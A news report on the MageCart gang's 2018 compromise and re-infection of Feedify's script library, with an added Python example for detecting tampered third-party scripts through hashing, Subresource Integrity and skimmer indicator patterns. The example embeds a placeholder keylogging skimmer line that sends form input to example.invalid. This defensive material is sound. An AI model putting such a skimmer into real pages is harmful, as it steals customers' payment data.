The MageCart crime gang appears very active in this period: payment card data from customers of hundreds of e-commerce websites may have been stolen due to the compromise of the cloud service firm Feedify.
Feedify has over 4,000 customers; it is a cloud platform that lets businesses engage their own customers with tools that target visitors based on their behavior.
Every time a user visited a page on the e-commerce site of a Feedify customer, the page loaded the malicious script that allowed the crooks to siphon personal information and payment card data.
They've been affected by Magecart since Friday, August 17 2018 @ 16:51:01 GMT as we recorded it. https://t.co/VjD5Qc3Be0
— Yonathan Klijnsma (@ydklijnsma) September 11, 2018
The group has been active since at least 2015 and has compromised many e-commerce websites to steal payment card and other sensitive data.
This script records keystrokes from customers and sends them to a server controlled by the attacker.
Typically these hackers compromise a third-party script or feature that is loaded by a large number of websites, so that a single intrusion gives them access to all of them.
Using the same tactic, MageCart compromised websites using the Feedify service by injecting their malicious code into a JavaScript library that the Feedify script served to customers' websites.
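The incident above was caught because a third party was monitoring the served library and noticed it had changed. The following is an added example, not code from the article or from Feedify or RiskIQ, of the two checks a site owner can run on a third-party script: a hash-change monitor that compares each fetch against a baselined copy (with a heuristic scan for input-collection code, so that a baseline captured while the attackers already had access is also flagged), and the Subresource Integrity value that makes the browser refuse a modified copy outright. The library bodies and the indicator patterns are constructed placeholders, not the real Feedify library or the real MageCart skimmer.

```python
import base64
import hashlib
import re

# Constructed sample data (assumption: not the real Feedify library or skimmer).
# BASELINE_JS is the copy captured when the script was first approved;
# CLEAN_FETCH and INFECTED_FETCH are two later fetches of the same URL.
BASELINE_JS = "function feedifyInit(o){return o;}\n"
CLEAN_FETCH = BASELINE_JS
INFECTED_FETCH = BASELINE_JS + (
    "document.addEventListener('keyup',function(e){"
    "new Image().src='https://example.invalid/c?d='+btoa(e.target.value)});\n"
)

# Heuristic indicators of input harvesting in a library that has no business
# reading forms. These are illustrative, not signatures of any real skimmer.
SUSPICIOUS_PATTERNS = [
    r"addEventListener\(\s*['\"]key(up|down|press)['\"]",
    r"new Image\(\)\.src\s*=",
    r"btoa\(",
    r"\.onsubmit\s*=",
]


def sha256_hex(content: str) -> str:
    return hashlib.sha256(content.encode("utf-8")).hexdigest()


def sri_attribute(content: str) -> str:
    """Value for <script src=... integrity="..."> (Subresource Integrity).

    A browser that supports SRI refuses to execute the script when the bytes
    it receives no longer hash to this value, so a server-side re-infection
    of the library fails closed on the client instead of running.
    """
    digest = hashlib.sha256(content.encode("utf-8")).digest()
    return "sha256-" + base64.b64encode(digest).decode("ascii")


def scan_indicators(content: str) -> list:
    return [p for p in SUSPICIOUS_PATTERNS if re.search(p, content)]


def check_library(baseline: str, fetched: str) -> dict:
    """Compare a fresh fetch of a third-party script with the baselined copy.

    Returns a report; 'alert' is true when the served bytes changed or when
    either copy contains input-harvesting indicators. Scanning the baseline
    too matters because a baseline taken while the attackers already had
    access to the vendor would otherwise whitelist the skimmer.
    """
    changed = sha256_hex(baseline) != sha256_hex(fetched)
    baseline_hits = scan_indicators(baseline)
    fetched_hits = scan_indicators(fetched)
    return {
        "changed": changed,
        "baseline_sha256": sha256_hex(baseline),
        "fetched_sha256": sha256_hex(fetched),
        "baseline_indicators": baseline_hits,
        "fetched_indicators": fetched_hits,
        "alert": changed or bool(baseline_hits) or bool(fetched_hits),
    }


if __name__ == "__main__":
    print("integrity attribute for approved copy:", sri_attribute(BASELINE_JS))
    for label, fetched in (("clean", CLEAN_FETCH), ("infected", INFECTED_FETCH)):
        report = check_library(BASELINE_JS, fetched)
        print(label, "alert" if report["alert"] else "ok", report["fetched_indicators"])
```

In practice the fetch would be scheduled (the tweets above show the re-infection was timestamped to the minute by exactly this kind of polling), and the `integrity` value would be pinned in the page markup so that a vendor-side change has to be re-approved rather than silently executed on every checkout page.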
According to the experts from RiskIQ, MageCart hackers might have had access to the Feedify servers for nearly a month.
Once notified of the compromise, Feedify removed the malicious script (as noted by Placebo (@Placebo52510486) on September 11, 2018), but the hackers apparently re-infected the library:
FYI: Feedify is re-infected with Magecart since about an hour ago, exact time of infection is: Wed, 12 Sep 2018 14:16:02 GMT.
— Yonathan Klijnsma (@ydklijnsma) September 12, 2018
The events demonstrate the ability of the MageCart crime gang to compromise the infrastructure of its victims and to return once a cleanup has been done.
In August, security expert Willem de Groot discovered that the MagentoCore skimmer had at that time already infected 7,339 Magento stores.
At the time, a query of the PublicWWW service showed the MagentoCore script deployed on 5,214 domains; the number of compromised websites is still high (4,762) despite the awareness campaign.
(Security Affairs – cybercrime, MageCart)